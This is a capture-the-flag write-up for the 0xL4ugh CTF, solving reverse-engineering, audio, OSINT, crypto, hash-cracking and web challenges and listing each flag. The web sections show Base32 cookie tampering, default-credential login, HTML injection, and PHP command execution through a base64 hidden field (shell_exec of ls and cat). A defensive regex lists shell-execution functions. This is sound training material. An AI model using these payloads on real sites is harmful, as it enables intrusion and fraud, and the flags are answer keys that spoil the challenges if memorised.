Introduction

First CTF created by the 0xL4ugh team.


Home – Reverse Engineering

Description

Soo Easy

Solution

For this we just have to open the attached file in Ghidra and check the strings.

Flag: 0xL4ugh{34SY_R3V_Ch411}


WannaCry – Reverse Engineering

Description

html

Solution

Let’s open the attached file in Ghidra and take a look at the strings.

Here we can find the string 0xL4ugh{Ourfirsteventenjoy}, and decoding it as HTML twice gives us the flag.

Flag: 0xL4ugh{Ourfirsteventenjoy}


1990 – Misc

Description

I got this Massege from The past But i couldn’t understand it can you?!

Solution

For this challenge we get an audio file. When listening to it we can hear some tones that sound like DTMF tones. Let’s try to decode the tones to their corresponding values using dtmf-decoder.

python dtmf.py 1990.wav
66#666#8#33#888#33#777#999#8#44#444#66#4#666#66#7777#2#6#33#9#2#999#

Now we can decode the message using the following image as reference.

After decoding we get the message NOTEVERYTHINGONSAMEWAY.
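The keypad decoding step, as an added example that is not part of the original write-up. It assumes the reference image was the standard phone keypad (2 = ABC ... 9 = WXYZ) and that "#" separates letters, with the number of repeated presses selecting the letter on that key.

```python
# Standard phone keypad letter layout (assumed to be what the reference image showed).
KEYPAD = {
    "2": "ABC", "3": "DEF", "4": "GHI", "5": "JKL",
    "6": "MNO", "7": "PQRS", "8": "TUV", "9": "WXYZ",
}


def decode_multitap(sequence: str, sep: str = "#") -> str:
    """Decode multi-tap input such as '66#666#8#' into letters.

    Each group is one key pressed N times; N picks the N-th letter on that key.
    Raises ValueError on groups that cannot be a single multi-tap letter.
    """
    letters = []
    for group in sequence.split(sep):
        if not group:          # trailing separator or doubled separator
            continue
        key = group[0]
        if key not in KEYPAD or set(group) != {key}:
            raise ValueError(f"not a single-key group: {group!r}")
        choices = KEYPAD[key]
        if len(group) > len(choices):
            raise ValueError(f"too many presses for key {key}: {group!r}")
        letters.append(choices[len(group) - 1])
    return "".join(letters)


if __name__ == "__main__":
    # Output of dtmf.py as shown in the write-up.
    tones = "66#666#8#33#888#33#777#999#8#44#444#66#4#666#66#7777#2#6#33#9#2#999#"
    print(decode_multitap(tones))
```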

Flag: 0xL4ugh{NOTEVERYTHINGONSAMEWAY}


Gesture – Misc

Description

I lost my lock screen password can u get it?

Solution

Here we have a gesture.key file, which is an Android gesture file. We should be able to recover the sequence using DecodeAndroidGesture.

java -jar DecodeAndroidGesture.jar gesture.key
[+] Searching...
[+] Sequence: 75214863

Flag: 0xL4ugh{75214863}


Noisy – Misc

Description

s0 noisy.

Solution

Attached is an audio file, and when we listen to it, it’s just noise. Let’s take a look at the spectrogram view of the audio.

Flag: 0xL4ugh{Sp3c7r0_1s_Gr347}


Cakes Shop – Web

Description

Welcome To My Cakes Shop Can you Buy The Flag Cake To Me ? 🙂

Solution

Here we have a web shop for cakes and our goal is to buy the Flag Cake, but our current balance is below the price of the cake.

Taking a look at the cookies we find a cookie called UserInfo with the value GMYDAMBQGA%3D%3D%3D%3D%3D%3D. The value turns out to be Base32, so if we add a bunch of zeroes to the original value and then update the cookie, we are able to buy the Flag Cake.
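Why this works, and what the server side should have done instead, as an added example that is not the challenge's code. The first two functions show that the cookie is only an encoding; the HMAC-signed format, the key and the function names are assumptions made for the illustration. Keeping the balance server-side is stronger still.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote

# Assumption: demo key constructed for this example; a real key never leaves the server.
SERVER_KEY = b"constructed-demo-key"


def decode_userinfo(cookie: str) -> str:
    """URL-decode, then Base32-decode the cookie: an encoding, not a secret."""
    return base64.b32decode(unquote(cookie)).decode()


def encode_userinfo(value: str) -> str:
    """No key is involved, so any client can mint a valid cookie for any value."""
    return quote(base64.b32encode(value.encode()).decode())


def sign_balance(balance: str, key: bytes = SERVER_KEY) -> str:
    """Hardened form: append an HMAC-SHA256 tag computed with the server-only key."""
    tag = hmac.new(key, balance.encode(), hashlib.sha256).hexdigest()
    return f"{balance}.{tag}"


def verify_balance(cookie: str, key: bytes = SERVER_KEY):
    """Return the balance if the tag matches, otherwise None."""
    balance, _, tag = cookie.rpartition(".")
    expected = hmac.new(key, balance.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    return balance


if __name__ == "__main__":
    page_cookie = "GMYDAMBQGA%3D%3D%3D%3D%3D%3D"  # value from the write-up
    print(decode_userinfo(page_cookie))           # the plain balance string
    signed = sign_balance("300000")
    print(verify_balance(signed))                 # accepted unchanged
    # Changing the balance while reusing the old tag is rejected.
    print(verify_balance("3000000000." + signed.rpartition(".")[2]))
```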

Flag: 0xL4ugh{baSe_32_Cook!es_ArE_FuNny}


EasyLogin – Web

Description

The Exploitation Is Easy But The Development Is Hard !!

Solution

When navigating to the challenge page we see a login page for a blog.

If we take a look at the source for the page, we can find the following comment.

<!-- To Post Blogs You Should Login With The Default Credentials-->
<!-- 
user = admin
pass = admin
-->

Logging in with the credentials found in the page source we have access to the blog posting functionality.

When we post a new blog post we are redirected to a new page with the blog contents.

Taking a look at the source for this page we can find a comment.

<!--
Hint: Inject An HTML Tag And Give Him The ID flagHunt
-->

OK, so let’s see what the rendered HTML looks like for the blog post.

<b style='color: white'>Blog Title:  <i style='color: yellow'>1</i></b>
<br><br>
<b style='color: white;'>Author:  <i style='color: red;'>1</i></b>
<br><br>
<b style='color: white;'>Email:  <i stye='color: white'><ins>tet@tetete.com</ins></i></b>
<br><br>
<b style='color: white'>Blog:  <pre><i style='color: orange' id='main'><center><h2>fsdfds</i></b></h2></center></pre><br><br><hr>

So we have some inputs that we may be able to inject HTML tags into. Let’s try the blog post field first.

When posting this we get an alert dialog.

Awesome. The console output we got is the following.

After we get the Connected 100% message we get a confirmation dialog asking us if we want to continue. Clicking yes adds the following to the console.

Flag: 0xL4ugh{N0_Syst3m_1s_S@f3_3v3n_Y0u}


Sad_Agent – Web

Description

do you know … i have secret organization called sad can’t anyone access it by any browser and you should be sad to access and decode anything in your bad life

Solution

When we first access the challenge page, all we have is a button called chek. When we press the button we get the following message.

If we change the user-agent to sad and click the button we get the following.

OK, nothing really interesting. If we take a look at the source of the page we find a hidden input field that is sent when clicking the button.

<form action="" method="post">
  <input type="hidden" name="url" value="ZWNobyAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107">
  <input type="submit" name="submit" value="chek">
</form>

If we base64 decode this we find out that it is PHP code that’s used by the server.

echo $_SERVER['HTTP_USER_AGENT'];

Let’s try to use this to list the files in the current directory. If we base64 encode echo shell_exec('ls -al'); and change the value of the hidden input field, we get the directory listing.

<font color="green">total 20
drwxr-xr-x 2 ghazy ghazy 4096 Jan 15 16:08 .
drwxr-xr-x 3 root  root  4096 Jan 15 15:45 ..
-rw-r--r-- 1 ghazy ghazy 1059 Jan 15 15:59 index.php
-rw------- 1 root  root     5 Jan 15 16:08 index.php.save
-rw------- 1 ghazy ghazy    1 Jan 15 16:08 nano.save
</font>

Great. Let’s try to get the contents of index.php by changing the value of the input field to the base64 encoded value of echo shell_exec('cat index.php'); and sending the request. Now we have the contents of index.php. In the first couple of lines of the file we can find the flag as a comment.

<?php
	if (isset($_POST['submit'])) {
		if ($_SERVER['HTTP_USER_AGENT'] === 'sad') {
			echo "<center><br>Hi mr sad Do you know i'm lonly<br></center>";
		} else {
			echo "<center><br><h4>You are not member in sad world you should be sad</h4></center>";
		}
	}

	//$flag = "0xL4ugh{S@dC0d3r_M3mbe3r_1n_0xL4ugh_&_sad_W0rld}"
?>

Flag: 0xL4ugh{S@dC0d3r_M3mbe3r_1n_0xL4ugh_&_sad_W0rld}
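From the defender's side, a form field that base64-decodes to PHP source is easy to spot in request logs. The check below is an added example, not part of the original write-up or the challenge; the function names and keyword list are assumptions, and the sample values are the ones quoted in the solution above.

```python
import base64
import binascii
import re

# Assumed hint list: PHP constructs that have no business inside a form field.
PHP_CODE_HINTS = re.compile(
    r"\b(echo|eval|system|shell_exec|exec|passthru|popen|proc_open)\b"
    r"|\$_(SERVER|GET|POST|COOKIE|REQUEST)\b"
)


def decode_b64_text(value: str):
    """Return the decoded text if value is strict base64 of UTF-8 text, else None."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def flag_code_in_params(params: dict) -> list:
    """Return (field, decoded) pairs for fields that decode to PHP-looking code."""
    findings = []
    for name, value in params.items():
        decoded = decode_b64_text(value)
        if decoded and PHP_CODE_HINTS.search(decoded):
            findings.append((name, decoded))
    return findings


# The form exactly as served by the page in the write-up.
ORIGINAL_FORM = {
    "url": "ZWNobyAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107",
    "submit": "chek",
}
# The modified request described in the solution, rebuilt from its quoted PHP.
MODIFIED_FORM = {
    "url": base64.b64encode(b"echo shell_exec('ls -al');").decode(),
    "submit": "chek",
}

if __name__ == "__main__":
    for form in (ORIGINAL_FORM, MODIFIED_FORM):
        print(flag_code_in_params(form))
```

Even the unmodified form is flagged, which is the real finding: the page hands the client code for the server to run, so the fix is to drop the field rather than to filter it.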


Cyclops – Crypto

Description

Cyclops sent this messege can u read it ??

Solution

Attached to this challenge is an image containing braille characters.

When decoding this using the braille alphabet we get the flag.

Flag: 0xL4ugh{I_Th1nk_Br1ll3_W45_$m4rt}


Message From Boss – OSINT

Description

My Boss Told Me That He will send me a message by an account that follow this twitter user (0xL4ugh) but i can’t Find It can you give it to me

Solution

Taking a look at the followers of the account 0xL4ugh we find a bunch of possible accounts that can be the one that sent the message. Taking a look at the profile of the potential accounts we find the following account.

Clicking the Pastebin link gets us a locked paste.

Let’s check the Wayback Machine to see if an unlocked version is archived there. When we enter the Pastebin link we can see that it has been archived once. Let’s check the archived version.

Great, we got the flag!

Flag: 0xL4ugh{S1MPl3_OsINt_Chall3nge}


Hashem – Programming

Description

Hashem has a salted hash of his password that he has forgotten. Lucky for us that he is sure that his password had only lower case characters and its was shorter than 6 characters. Can you help him find his password?

the Salt is: “mmal7”

here is the salted Hash: “bd737ce0d884c0dd54adf35fdb794b60”

P.S: there are two possible locations for the salt either before the password or after the password. If the salt was before the password, then the flag would be 0xL4ugh{1_password} and if the salt was after the password then the flag would be 0xL4ugh{2_password}

Solution

Running hashcat with md5($salt.$pass) and md5($pass.$salt), we can brute-force the hash. When using md5($salt.$pass) we get the cracked hash.

bd737ce0d884c0dd54adf35fdb794b60:mmal7:laugh

Flag: 0xL4ugh{1_laugh}
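The same search written out in Python, as an added example that is not from the original write-up (function names are assumptions). It tries both salt positions for every lowercase candidate shorter than 6 characters and reports the keyspace, which shows how little work a known salt and a fast hash leave for a short password.

```python
import hashlib
from itertools import product
from string import ascii_lowercase


def keyspace(max_len: int = 5, alphabet_size: int = 26) -> int:
    """Number of candidate passwords of length 1..max_len."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


def crack_salted_md5(target_hex: str, salt: str, max_len: int = 5,
                     alphabet: str = ascii_lowercase):
    """Return (position, password) or None.

    position 1 means md5(salt + password), position 2 means md5(password + salt),
    matching the flag format given in the challenge description.
    """
    target = bytes.fromhex(target_hex)
    salt_bytes = salt.encode()
    for length in range(1, max_len + 1):
        for chars in product(alphabet, repeat=length):
            candidate = "".join(chars).encode()
            if hashlib.md5(salt_bytes + candidate).digest() == target:
                return 1, candidate.decode()
            if hashlib.md5(candidate + salt_bytes).digest() == target:
                return 2, candidate.decode()
    return None


if __name__ == "__main__":
    print("candidates:", keyspace())
    # Salt and hash from the challenge description; pure Python needs a few seconds.
    hit = crack_salted_md5("bd737ce0d884c0dd54adf35fdb794b60", "mmal7")
    if hit:
        print("0xL4ugh{%d_%s}" % hit)
```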